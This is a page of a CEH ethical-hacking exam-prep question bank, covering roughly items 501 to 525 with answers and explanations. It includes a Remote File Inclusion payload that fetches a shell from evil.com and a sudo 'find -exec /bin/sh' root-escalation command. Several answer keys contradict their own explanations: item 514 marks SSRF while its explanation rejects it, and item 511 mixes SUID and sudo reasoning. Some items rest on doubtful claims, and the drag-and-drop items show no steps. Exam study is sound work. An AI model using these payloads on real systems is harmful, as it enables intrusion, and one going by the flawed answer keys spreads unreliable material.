The 'Options -Indexes' directive explicitly disables the automatic generation of directory listings when a default index file (such as index.html or index.php) is not found within a directory. By removing the 'Indexes' option, the web server is configured to return a '403 Forbidden' error instead of displaying the contents of the directory to the client. This is the direct and intended method for preventing directory browsing in Apache, effectively mitigating information disclosure risks.

Why this answer

Disabling the Indexes option in the Directory directive prevents Apache from listing directory contents when no index file exists.

501
MCQhard

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

A.ARP poisoning
B.SYN flood
C.ICMP flood
D.DNS amplification
AnswerB

The flood of SYN packets with spoofed or unused source addresses, followed by incomplete handshakes, exhausts the target's half-open connection table. The destination's SYN-ACKs go unanswered because no real client exists, which is the defining signature of a SYN flood.

Why this answer

This behavior describes a classic SYN flood attack. The source (10.0.0.1) sends a high volume of TCP SYN packets with incremental sequence numbers to the target (192.168.1.1). The target responds with SYN-ACK packets, but the source never sends the final ACK to complete the three-way handshake.

This leaves the target with half-open connections that exhaust its connection table, denying service to legitimate traffic.

Exam trap

The trap here is that candidates may confuse a SYN flood with a TCP three-way handshake completion failure due to a firewall or routing issue, but the key indicator is the large number of SYN packets with no final ACK, which is the hallmark of a deliberate DoS attack, not a network glitch.

How to eliminate wrong answers

Option A is wrong because ARP poisoning involves sending forged ARP replies to associate the attacker's MAC address with the IP of a legitimate host, not sending TCP SYN packets with incremental sequence numbers. Option C is wrong because an ICMP flood uses ICMP echo request (ping) packets, not TCP SYN packets, to overwhelm a target. Option D is wrong because DNS amplification exploits open DNS resolvers to send large DNS response packets to a spoofed victim IP, using UDP, not TCP SYN packets.

502
MCQmedium

A security team wants to identify all live hosts on a large, Class B private IP network (172.16.0.0/16) as quickly as possible while minimizing network load. Which tool and technique should they use?

A.Masscan with --ping to send ICMP echo requests across the /16 range
B.Use theHarvester to query DNS records for the domain
C.Nmap with -sn (ping sweep) on all 65536 IPs
D.hping3 with --icmp on each IP sequentially
AnswerA

Masscan is specifically engineered for high-speed network scanning, capable of transmitting millions of packets per second. Utilizing the `--ping` option directs Masscan to send ICMP echo request packets across the entire /16 range, efficiently identifying live hosts. Its asynchronous design allows it to discover active devices across 65,536 IP addresses in a fraction of the time compared to traditional scanners, making it the optimal tool for rapid, large-scale host discovery.

Why this answer

Masscan is designed for high-speed scanning and can send ICMP echo requests across a /16 range (65,536 IPs) in seconds, far faster than Nmap or hping3, while its --ping mode minimizes network load by using stateless packet transmission. This makes it the optimal choice for quickly identifying live hosts on a large private network without overwhelming the network.

Exam trap

The trap here is that candidates often assume Nmap's -sn is the fastest option because it is the most commonly used ping sweep tool, but they overlook Masscan's specialized design for ultra-high-speed scanning across large ranges, which is explicitly tested in CEH questions about minimizing time and network load.

How to eliminate wrong answers

Option B is wrong because theHarvester is a tool for gathering email addresses, subdomains, and other OSINT data from public sources like search engines and DNS records, not for performing live host discovery on a private IP range. Option C is wrong because Nmap's -sn ping sweep, while effective, is significantly slower than Masscan on a /16 range due to its stateful scanning approach, which creates more network overhead and takes much longer to complete. Option D is wrong because hping3 with --icmp sends packets sequentially to each IP, which is extremely slow and inefficient for scanning 65,536 hosts, and it does not minimize network load as it requires per-packet state tracking.

503
MCQhard

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

A.Directory traversal
B.Local File Inclusion (LFI)
C.Command injection
D.Remote File Inclusion (RFI)
AnswerD

Remote File Inclusion (RFI) vulnerabilities allow an attacker to force the web application to include and execute or display a file hosted on a remote server, typically controlled by the attacker. This is achieved by injecting a full URL into a vulnerable parameter that the application uses to dynamically include files. The payload's explicit use of a remote URL is the defining characteristic of an RFI attack, enabling the server to fetch and process content from an external source.

Why this answer

The payload includes a URL to a remote file (http://evil.com/shell.txt) that the server fetches and executes or returns. This is characteristic of Remote File Inclusion (RFI), where an attacker includes a file from an external server. The server returning the contents indicates the remote file was included.

Exam trap

CEH often tests the distinction between LFI and RFI; candidates may confuse the two, but the presence of a remote URL in the payload clearly indicates RFI.

How to eliminate wrong answers

Option A is wrong because directory traversal (e.g., ../../etc/passwd) accesses local files outside the web root, not remote files. Option B is wrong because LFI includes local files on the same server, not remote ones. Option C is wrong because command injection executes OS commands, not file inclusion.

504
MCQhard

An attacker has obtained password hashes from a Windows system. They plan to use rainbow tables to crack them. Which tool would be most appropriate for generating and using rainbow tables?

A.Hashcat
B.Ophcrack
C.John the Ripper
D.RainbowCrack
AnswerD

RainbowCrack is the definitive and specialized tool explicitly designed for the generation and utilization of rainbow tables. It implements the time-memory tradeoff technique to precompute cryptographic hash chains, allowing for rapid lookup of plaintext passwords from their corresponding hashes. This makes RainbowCrack the standard choice when an attacker intends to leverage or create rainbow tables for efficient password cracking.

Why this answer

RainbowCrack is the tool specifically designed for generating and using rainbow tables, which are precomputed hash chains used to reverse cryptographic hash functions. The question explicitly asks for the tool most appropriate for generating and using rainbow tables, and RainbowCrack directly supports both creating rainbow tables (with rtgen) and performing lookups (with rcsort and rcrack).

Exam trap

EC-Council often tests the distinction between tools that crack passwords via brute-force/dictionary (Hashcat, John the Ripper) versus tools that specifically leverage precomputed rainbow tables (RainbowCrack, Ophcrack), and candidates mistakenly choose Hashcat because it is the most popular GPU cracker, ignoring the explicit 'rainbow tables' requirement.

How to eliminate wrong answers

Option A is wrong because Hashcat is a GPU-accelerated password cracker that uses brute-force, dictionary, or rule-based attacks, not rainbow tables; it does not generate or use precomputed rainbow tables. Option B is wrong because Ophcrack is a specialized tool for cracking Windows LM and NTLM hashes using its own precomputed rainbow tables, but it is not designed for generating custom rainbow tables; it relies on tables from the Ophcrack project. Option C is wrong because John the Ripper is a versatile password cracker that supports multiple attack modes (dictionary, brute-force, incremental) but does not natively generate or use rainbow tables; its 'john --format=nt --make-charset' is for Markov mode, not rainbow tables.

505
Multi-Selecthard

Which THREE of the following are types of SQL injection attacks? (Choose 3)

Select 3 answers
A.Out-of-band SQLi (e.g., DNS or HTTP exfiltration)
B.Stored SQLi
C.In-band SQLi (error-based or union-based)
D.Blind (inferential) SQLi (boolean- or time-based)
E.Reflected SQLi
AnswersA, C, D

Out-of-band SQLi exfiltrates data through a separate channel such as DNS or HTTP requests, used when in-band and inferential techniques are blocked. It is a recognised SQL injection category, satisfying the question's requirement for attack types.

Why this answer

Option A is correct because out-of-band SQLi is a recognized SQL injection category in which the attacker uses a separate channel such as DNS or HTTP requests to exfiltrate data when the database server cannot return results directly through the application response. Option C is correct because in-band SQLi is the classic SQL injection type where results are returned in the same communication channel, typically via error-based or UNION-based techniques that leverage database error messages or UNION SELECT statements. Option D is correct because blind (inferential) SQLi is a standard SQL injection category where no data is directly returned; instead, attackers infer information using boolean-based true/false responses or time-based delays such as WAITFOR DELAY or SLEEP.

Option B is not a recognized SQLi type; 'stored' describes stored XSS, not SQL injection, even though stored procedures can be involved in SQLi. Option E is also not a SQLi category; 'reflected' describes reflected XSS, where malicious script is echoed back by the application rather than injected into SQL queries.

Exam trap

EC-Council often tests candidates by mixing SQL injection categories with XSS terminology (stored/reflected) to see if they confuse web attack types; the trap here is that 'stored' and 'reflected' are not SQLi types but XSS variants.

506
MCQeasy

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

A.Virus
B.Trojan
C.Worm
D.Ransomware
AnswerC

A worm is a standalone malicious program designed to self-replicate and propagate autonomously across computer networks without requiring a host program or user intervention. It exploits network vulnerabilities or configuration weaknesses to spread from one system to another, consuming bandwidth and system resources. This self-replicating capability is its defining characteristic, allowing it to infect numerous machines rapidly.

Why this answer

A worm is a standalone malware program that replicates itself across networks without requiring a host file or user intervention. It exploits network vulnerabilities, such as unpatched services or weak credentials, to propagate automatically, often using protocols like SMB, RDP, or email transport mechanisms.

Exam trap

The trap here is that candidates often confuse a worm's self-replication with a virus's need for a host file, leading them to select 'Virus' because they associate malware spread with file infection, ignoring the worm's autonomous network propagation capability.

How to eliminate wrong answers

Option A is wrong because a virus requires a host file (e.g., an executable or document) to attach itself and relies on user action (e.g., opening a file) to spread, not automatic network replication. Option B is wrong because a Trojan disguises itself as legitimate software but does not self-replicate; it relies on social engineering to trick users into executing it. Option D is wrong because ransomware encrypts files for extortion and typically spreads via email attachments or exploits, but it is not defined by autonomous network propagation without a host file.

507
Multi-Selecteasy

Which TWO of the following are characteristics of stored (persistent) XSS?

Select 2 answers
A.The attack requires the victim to click a crafted link
B.The payload is reflected immediately in the response
C.The malicious script is stored on the server (e.g., in a database)
D.The attack only works if the victim is logged in
E.The attack can affect multiple users without direct interaction
AnswersC, E

A defining characteristic of Stored XSS, also known as Persistent XSS, is that the attacker's malicious script is successfully injected into and saved within the web application's backend infrastructure, such as a database, comment section, or user profile. This persistence means the payload remains on the server, ready to be delivered to any user who later requests the affected content, making it a highly potent and widespread threat.

Why this answer

Stored XSS involves malicious script being permanently stored on the server (e.g., in a database) and executed whenever the stored content is accessed. It does not require a crafted link, and it can affect multiple users without direct interaction.

508
Multi-Selecthard

Which THREE of the following are methods attackers use to cover their tracks after compromising a system?

Select 3 answers
A.Modifying file timestamps
B.Deleting event logs
C.Installing a rootkit
D.Performing a dictionary attack
E.Running a vulnerability scanner
AnswersA, B, C

Attackers utilize tools like `touch` on Linux or specialized utilities on Windows to meticulously alter the MAC (Modification, Access, Change) times of files and directories. This technique, known as timestomping, aims to blend malicious files with legitimate system files by making them appear older or newer than their actual creation or modification, thereby evading detection during forensic analysis and obscuring the true timeline of compromise or data exfiltration.

Why this answer

Modifying file timestamps (A) is a common anti-forensic technique used to hide the evidence of file creation, modification, or access. Attackers use tools like `touch` on Linux or `SetFileTime` on Windows to alter the MAC (Modify, Access, Change) timestamps, making malicious files appear as legitimate system files. This prevents forensic investigators from identifying when the compromise occurred or which files were altered.

Exam trap

EC-Council often tests the distinction between attack phases, so candidates mistakenly associate dictionary attacks and vulnerability scanning with post-exploitation activities, when they actually belong to the enumeration and system hacking phases, not the covering tracks phase.

509
MCQeasy

Which enumeration technique would be MOST effective for gathering usernames from an SMTP server that supports the VRFY command?

A.SNMP enumeration using SNMPwalk
B.SMTP VRFY enumeration
C.NetBIOS enumeration using nbtstat
D.LDAP anonymous queries
AnswerB

The SMTP VRFY command is specifically designed to verify the existence of a user on the mail server without actually sending an email. When an attacker sends a VRFY request with a potential username, the server responds by indicating whether the user exists, often revealing the full name or email address if present. This direct query capability makes VRFY an extremely effective and straightforward technique for enumerating valid user accounts on an SMTP server, provided the server has not been configured to disable or restrict this command.

Why this answer

The VRFY command is an SMTP protocol command (RFC 821) that allows a client to verify whether a specific mailbox exists on the server. Since the question explicitly states the SMTP server supports VRFY, sending VRFY requests with common usernames or using a wordlist directly enumerates valid usernames, making SMTP VRFY enumeration the most effective technique.

Exam trap

The trap here is that candidates may confuse VRFY with EXPN (which expands mailing lists) or assume any enumeration technique (like SNMP or LDAP) can be adapted to SMTP, but the question specifically ties the technique to the protocol command supported by the server.

How to eliminate wrong answers

Option A is wrong because SNMP enumeration using SNMPwalk targets SNMP-enabled devices to extract MIB data (e.g., system information, running processes), not SMTP usernames; it requires SNMP community strings and has no relation to the SMTP VRFY command. Option C is wrong because NetBIOS enumeration using nbtstat works over NetBIOS (port 137) to gather computer names, shares, and logged-in users on Windows networks, not SMTP mailboxes. Option D is wrong because LDAP anonymous queries target LDAP directories (port 389) to enumerate users, groups, and objects in a directory service like Active Directory, not an SMTP server's mailbox list.

510
Multi-Selectmedium

Which TWO of the following are passive reconnaissance techniques?

Select 2 answers
A.Ping sweep
B.Google hacking (dorking)
C.Nmap SYN scan
D.Banner grabbing with Netcat
E.WHOIS lookup
AnswersB, E

Google hacking queries indexed caches and search-engine metadata, never touching the target's systems, which satisfies the passive constraint of zero direct interaction. Dorks expose filetypes, directory listings and login pages already crawled, so no packets reach the organisation's infrastructure and no IDS or logging records the activity.

Why this answer

Google hacking (dorking) is a passive reconnaissance technique because it involves using advanced search operators in Google to discover publicly indexed information about a target, such as exposed configuration files or login pages, without sending any packets directly to the target's systems. It relies entirely on the search engine's pre-existing index, making it undetectable and non-intrusive. Similarly, WHOIS lookup is a passive reconnaissance technique because it queries public WHOIS databases to retrieve domain registration information, such as registrant details, name servers, and expiration dates, without directly interacting with the target's own infrastructure.

Both techniques align with the CEH definition of passive reconnaissance, where no direct interaction with the target occurs.

Exam trap

The trap here is that candidates often confuse 'passive' with 'stealthy' and incorrectly classify techniques like banner grabbing or SYN scans as passive because they can be performed with minimal noise, but CEH strictly defines passive reconnaissance as having zero direct interaction with the target's systems.

511
MCQmedium

During a penetration test, a tester gains a low-privilege shell on a Linux server. The command `sudo -l` reveals that the user can run `/usr/bin/find` as root. Which technique can the tester use to escalate privileges?

A.Abuse the SUID bit on find
B.Use find with the -exec flag to spawn a shell
C.Exploit a kernel vulnerability
D.Run a buffer overflow on the find binary
AnswerB

This is a well-known and highly effective privilege escalation vector. If the `find` binary has the SUID (Set User ID) bit set, or if a low-privilege user can execute `find` with `sudo` privileges without a password, the `-exec` flag can be leveraged to execute arbitrary commands as the owner of the `find` binary (typically root). For example, `find . -exec /bin/sh -p \;` would spawn a privileged shell, effectively escalating privileges from the low-privilege shell.

Why this answer

The `sudo -l` output shows the user can run `/usr/bin/find` as root without a password. The `find` command has a built-in `-exec` flag that allows executing arbitrary commands on each found file. By running `sudo find / -exec /bin/sh \;`, the tester can spawn a root shell, escalating privileges because the command runs with sudo (root) privileges.

Exam trap

The trap here is that candidates may think the SUID bit (Option A) is the only way to escalate with find, but the question explicitly states the user has sudo access to find, making the `-exec` flag the correct and immediate vector.

How to eliminate wrong answers

Option A is wrong because the SUID bit is a file permission that allows a binary to run with the owner's privileges, but here the privilege escalation is via sudo, not the SUID bit; the find binary may not have the SUID bit set, and even if it did, the sudo rule is the direct vector. Option C is wrong because exploiting a kernel vulnerability is unnecessary when a valid sudo misconfiguration already provides a direct path to root; kernel exploits are risky, noisy, and should be a last resort. Option D is wrong because running a buffer overflow on the find binary is an overly complex and unreliable technique; the find binary is not known to have a trivial buffer overflow, and the `-exec` flag provides a clean, intended method for command execution.

512
MCQhard

A security team discovers that an S3 bucket configured for static website hosting is exposing sensitive documents. The bucket policy allows public read access. Which AWS misconfiguration is MOST likely present?

A.The bucket policy allows s3:GetObject for all principals
B.The bucket versioning is disabled
C.The bucket is not using server-side encryption
D.The bucket ACL grants write access to authenticated users
AnswerA

A bucket policy explicitly allowing the "s3:GetObject" action for "Principal": "*" (all principals) directly grants public read access to all objects within that S3 bucket. This configuration overrides default private settings, making the bucket's contents accessible to anyone on the internet without authentication. Such a policy is the primary mechanism for intentionally exposing S3 objects publicly for read operations.

Why this answer

Public read access to the bucket and objects is the direct cause. Blocking public access would prevent this.

513
MCQhard

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

A.Implement a whitelist of allowed domains and IP addresses for outbound requests
B.Use input validation to block URLs containing '127.0.0.1' or 'localhost'
C.Implement CSRF tokens on all forms
D.Disable unnecessary HTTP methods on the web server
AnswerA

Implementing a whitelist of allowed domains and IP addresses for outbound requests is the most effective defense against Server-Side Request Forgery (SSRF). This robust control ensures the server can only initiate connections to explicitly permitted external resources or internal services. By strictly restricting outbound connections to a predefined, trusted list, any attempt by an attacker to force the server to connect to unauthorized internal systems or arbitrary external hosts will be blocked, directly mitigating the SSRF vulnerability.

Why this answer

Whitelisting allowed domains and IP addresses is the most effective SSRF mitigation because it restricts the server from making requests to arbitrary external or internal resources.

514
MCQhard

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

A.HTTP request smuggling
B.IDOR (Insecure Direct Object Reference)
C.Clickjacking
D.Server-Side Request Forgery (SSRF)
AnswerD

Correct. SSRF occurs when the server is tricked into making internal requests based on user-controlled input, such as the X-Forwarded-For header, which can lead to access to internal resources or administrative interfaces.

Why this answer

The scenario describes spoofing the X-Forwarded-For header to bypass IP-based access controls. This is not SSRF; SSRF involves the server making outbound requests to internal resources based on user input. None of the listed options correctly identifies this attack.

515
Multi-Selectmedium

Which TWO of the following are examples of social engineering attacks? (Select two)

Select 2 answers
A.Pharming
B.Pretexting
C.SYN flood
D.Brute force attack
E.Vishing
AnswersB, E

Pretexting is a social engineering attack where the attacker invents a fabricated scenario, often impersonating a trusted figure, to manipulate a victim into divulging information or performing actions. It relies on psychological manipulation rather than technical exploits, satisfying the question's requirement for a social engineering example.

Why this answer

Pretexting (B) is a social engineering attack because the attacker fabricates a believable scenario or false identity (a 'pretext') to manipulate a human target into divulging information or performing an action, exploiting trust rather than technical flaws. Vishing (E) is also social engineering, as it uses voice communication—typically a phone call or VoIP—to impersonate a trusted party and trick the victim into revealing credentials, payment data, or other sensitive information. The remaining options are technical attacks, not social engineering: pharming (A) redirects users to fraudulent websites via DNS poisoning or host file modification, SYN flood (C) is a network-layer denial-of-service attack abusing the TCP three-way handshake, and brute force (D) is a cryptographic or authentication attack that systematically tries keys or passwords.

Exam trap

The trap here is that candidates may confuse pharming (a technical redirection attack) with social engineering, but pharming does not involve direct human interaction or psychological manipulation, which is the defining characteristic of social engineering attacks.

516
MCQhard

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

A.Ettercap
B.Wireshark
C.Nmap
D.tcpdump
AnswerA

Ettercap performs ARP poisoning by forging ARP replies that bind the attacker's MAC address to the gateway's IP, placing the attacker inline to intercept traffic. Its built-in sniffing and MITM plugins make it the standard tool for this gateway-spoofing scenario.

Why this answer

Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN. It supports ARP poisoning, where it sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This causes the target's traffic destined for the gateway to be sent to the attacker, allowing interception and modification of packets.

Exam trap

The trap here is that candidates often confuse passive sniffing tools (like Wireshark or tcpdump) with active attack tools, assuming any packet capture tool can also inject packets, but only dedicated MITM tools like Ettercap implement ARP spoofing.

How to eliminate wrong answers

Option B is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting packets passively; it does not send forged ARP replies or actively manipulate network traffic. Option C is wrong because Nmap is a network discovery and security scanning tool used for port scanning and service enumeration; it does not perform ARP spoofing or man-in-the-middle attacks. Option D is wrong because tcpdump is a command-line packet analyzer used for capturing and displaying network traffic; it lacks the ability to inject forged ARP packets or conduct active interception attacks.

517
Multi-Selectmedium

Which TWO of the following are symmetric encryption algorithms? (Select 2)

Select 2 answers
A.ECC
B.RSA
C.3DES
D.AES
E.MD5
AnswersC, D

Triple DES (3DES) is a symmetric block cipher that applies the original Data Encryption Standard (DES) algorithm three times to each data block. It uses either two or three distinct keys to significantly enhance security beyond single DES, making it a more robust, albeit slower, symmetric encryption method. As a symmetric algorithm, 3DES employs the same key for both encryption and decryption operations.

Why this answer

3DES (Triple DES) is correct because it is a symmetric block cipher that applies the DES algorithm three times with keys, using the same secret key for both encryption and decryption. AES (Advanced Encryption Standard) is correct because it is a symmetric block cipher that uses a single shared secret key for encryption and decryption, with key sizes of 128, 192, or 256 bits. ECC (Elliptic Curve Cryptography) is not correct because it is an asymmetric public-key algorithm based on elliptic curve mathematics.

RSA is not correct because it is an asymmetric algorithm using a public/private key pair. MD5 is not correct because it is a cryptographic hash function, not an encryption algorithm.

Exam trap

CEH often tests the confusion between symmetric encryption, asymmetric encryption, and hashing by mixing algorithms like RSA, ECC, and MD5 into the same option list, so candidates must instantly classify each algorithm by its key model.

518
Multi-Selecteasy

Which TWO of the following are common tools used for SMB enumeration? (Select 2)

Select 2 answers
A.ldapsearch
B.snmpwalk
C.enum4linux
D.nbtstat
E.smbclient
AnswersC, E

enum4linux is a powerful wrapper script built upon Samba tools, specifically designed for enumerating information from Windows and Samba hosts. It automates the process of extracting user lists, group memberships, share names, password policies, and other critical data via the SMB/NetBIOS protocols. This comprehensive tool leverages various SMB enumeration techniques, making it highly effective for reconnaissance against Windows systems.

Why this answer

enum4linux is a wrapper tool that leverages SMB/CIFS operations (via smbclient, rpcclient, and net) to enumerate user lists, share listings, OS information, and password policies from Windows and Samba targets. It directly queries the SMB protocol (port 445/139) and is a standard tool for SMB enumeration in penetration testing.

Exam trap

EC-Council often tests the distinction between tools that operate at different protocol layers—candidates confuse NetBIOS name resolution tools (nbtstat) with SMB enumeration tools, or mistake LDAP/SNMP tools for SMB-specific ones.

519
Drag & Dropmedium

Drag and drop the steps to perform a successful social engineering attack in a penetration test into the correct order.

Drag or tap steps into the slots.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4

Why this order

In a social engineering penetration test, the correct sequence is Research (gather intelligence on the target), Craft Pretext (create a believable scenario), Choose Channel (select communication medium), Execute (deliver the attack), and Document (record findings). This order ensures the attack is tailored and effective, as each step builds on the previous one.

520
MCQmedium

A security analyst notices unusual outbound traffic from an internal server to a known malicious IP address on port 4444. The server is running a web application that was recently scanned using a vulnerability scanner. Which of the following is the MOST likely cause?

A.The server is performing a DNS lookup to resolve the malicious IP address
B.The web application is sending log data to a SIEM system for analysis
C.A vulnerability discovered during the scan was exploited, establishing a reverse shell connection to the attacker
D.The vulnerability scan caused a false positive and triggered a legitimate backup process
AnswerC

Port 4444 is Metasploit's default reverse shell listener, and outbound traffic to a malicious IP indicates the exploited host initiated the connection. The recent vulnerability scan likely identified the flaw the attacker then leveraged, satisfying the stem's requirement for the most likely cause of this beaconing behaviour.

Why this answer

Outbound traffic on port 4444 from an internal server to a known malicious IP is a classic indicator of a reverse shell connection. A reverse shell is a common post-exploitation technique where an attacker forces the victim server to connect back to their listener, often on high ports like 4444, bypassing inbound firewall rules. The timing after a vulnerability scan strongly suggests that a discovered vulnerability (e.g., command injection, RCE) was exploited to establish this shell.

Exam trap

The trap here is that candidates may confuse reverse shells with normal outbound traffic like DNS or backups, failing to recognize that port 4444 is a well-known Metasploit default for reverse TCP payloads and that outbound connections to malicious IPs are a hallmark of compromise.

How to eliminate wrong answers

Option A is wrong because DNS lookups use UDP or TCP port 53, not port 4444, and are not directed to a malicious IP for resolution; they query a DNS server. Option B is wrong because SIEM log forwarding typically uses ports like 514 (syslog), 1514, or 443 (HTTPS), not port 4444, and would not target a known malicious IP. Option D is wrong because a legitimate backup process would use standard backup ports (e.g., 445 for SMB, 22 for SSH, or 443 for HTTPS) and would not connect to a known malicious IP; false positives from vulnerability scans do not trigger outbound connections to attacker-controlled hosts.

521
Drag & Dropmedium

Drag and drop the steps to set up a VPN using IPsec in tunnel mode into the correct order.

Drag or tap steps into the slots.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4

Why this order

The correct sequence for setting up a VPN using IPsec in tunnel mode is: Phase 1 (IKE) to establish a secure channel, Phase 2 (IPsec) to negotiate security associations, then define traffic selectors (interesting traffic), apply the policies, and finally test the connection. This order ensures that the underlying secure infrastructure is built before defining and enforcing traffic rules, and that testing validates the entire setup.

522
MCQmedium

During a penetration test, you execute the command `enum4linux -a 192.168.1.20`. The output reveals that the 'backup' account has a blank password and belongs to the 'Domain Admins' group. Which phase of the CHPSET methodology does identifying this vulnerability belong to?

A.Privilege escalation
B.Cracking passwords
C.Spying
D.Executing applications
AnswerB

Cracking passwords refers to the process of discovering or bypassing authentication credentials, often through brute-force, dictionary attacks, or exploiting weak password policies. The `enum4linux` tool can enumerate user accounts and sometimes directly reveal blank or easily guessable passwords for services like SMB, or provide usernames that are crucial for subsequent offline or online password cracking attempts. Identifying a blank password is a direct form of credential compromise, making it a discovery within the realm of password cracking.

Why this answer

The command `enum4linux -a` enumerates SMB shares, users, and password policies from a Windows target. Discovering that the 'backup' account has a blank password directly identifies a weak or missing credential, which falls under the 'Cracking passwords' phase of the CHPSET methodology. This phase involves identifying and exploiting weak, default, or blank passwords to gain unauthorized access.

Exam trap

The trap here is confusing the 'Cracking passwords' phase with 'Privilege escalation' because discovering a blank password on a high-privilege account seems like a privilege escalation vector, but the CHPSET methodology defines password cracking as the phase where weak or blank credentials are identified and exploited.

How to eliminate wrong answers

Option A is wrong because privilege escalation occurs after initial access is obtained, not during the identification of a blank password vulnerability. Option C is wrong because spying refers to monitoring or eavesdropping on network traffic or user activity, not discovering account credentials. Option D is wrong because executing applications involves running tools or payloads to achieve a specific goal, whereas this step is about identifying a credential weakness.

523
Multi-Selectmedium

A penetration tester is conducting DNS enumeration. Which TWO of the following tools are specifically designed for DNS enumeration? (Select two)

Select 2 answers
A.dnsrecon
B.theHarvester
C.Nmap
D.Maltego
E.dnsenum
AnswersA, E

dnsrecon is a specialized command-line utility designed for comprehensive DNS enumeration. It automates the process of gathering extensive DNS information about a target domain, including host records, MX records, NS records, and performing zone transfer attempts. Furthermore, it can conduct brute-force subdomain discovery using wordlists and leverage Google dorks for additional subdomain identification, making it highly effective for reconnaissance.

Why this answer

dnsrecon is a dedicated DNS enumeration tool that performs multiple types of DNS queries (e.g., SRV, MX, SOA, zone transfer attempts) and supports brute-force subdomain discovery. It is specifically designed to gather DNS records and identify misconfigurations, making it a primary tool for DNS enumeration.

Exam trap

The trap here is that candidates often confuse general-purpose reconnaissance tools (like theHarvester or Maltego) with dedicated DNS enumeration tools, or they assume Nmap's DNS scripts make it a primary DNS enumeration tool, when in fact the question specifically asks for tools 'designed for DNS enumeration'.

524
MCQmedium

A security team discovers that an attacker has been using steganography to exfiltrate data from the corporate network. The attacker hid data inside image files and uploaded them to a public image hosting site. Which of the following is the BEST method to detect this type of exfiltration?

A.Compare file hashes of uploaded images to known-good baselines
B.Deploy a steganography detection tool that analyzes image pixel patterns for statistical anomalies
C.Block all image uploads to external sites
D.Use network-based DLP to inspect image file headers for hidden data
AnswerB

Deploying a steganography detection tool, also known as a steganalysis tool, is the most effective approach as these specialized utilities are designed to identify the subtle statistical anomalies introduced into image pixel patterns by embedded data. These tools analyze various image properties, such as Least Significant Bit (LSB) distributions or Discrete Cosine Transform (DCT) coefficients, to detect deviations from expected statistical models of 'clean' images. By identifying these irregularities, they can reliably flag images likely containing hidden information.

Why this answer

Steganography detection tools analyze statistical anomalies in pixel patterns (e.g., LSB embedding, DCT coefficient deviations) that are invisible to the human eye but detectable via algorithms like chi-square analysis or RS analysis. This directly identifies hidden payloads without relying on file hashes or headers, which steganography does not alter.

Exam trap

The trap here is that candidates confuse steganography detection with file integrity checking (Option A) or assume header inspection (Option D) can find hidden data, when in fact steganography operates at the pixel or transform coefficient level, not in metadata.

How to eliminate wrong answers

Option A is wrong because comparing file hashes to known-good baselines only detects unauthorized file modifications, not steganographic embedding that preserves the original hash if the attacker uses a copy or modifies metadata; steganography changes pixel data without altering the file's overall hash if the attacker uses a different file. Option C is wrong because blocking all image uploads to external sites is a draconian policy that disrupts legitimate business operations and does not detect exfiltration—it only prevents it, and attackers can use other channels (e.g., email, FTP). Option D is wrong because network-based DLP inspecting image file headers (e.g., EXIF, IHDR) cannot detect hidden data embedded in pixel values; steganography hides data in the image's raw pixel data, not in headers, so header inspection misses the payload entirely.

525
MCQmedium

During a wireless penetration test, a tester captures the 4-way handshake between a client and WPA2-PSK access point. Which tool would the tester MOST likely use to attempt to recover the pre-shared key?

A.Aircrack-ng
B.Wireshark
C.Kismet
D.Reaver
AnswerA

Aircrack-ng is a comprehensive suite of tools specifically designed for auditing wireless networks, including cracking WPA/WPA2-PSK. It leverages captured 4-way handshakes to perform dictionary or brute-force attacks against the pre-shared key. By comparing the captured handshake with hashes generated from a wordlist, Aircrack-ng can efficiently recover weak or common passphrases.

Why this answer

The correct tool is aircrack-ng, which is specifically designed to crack WPA/WPA2 PSK by performing dictionary attacks on captured handshakes. It is part of the aircrack-ng suite widely used for wireless security auditing.

Page 6

Page 7 of 13

Page 8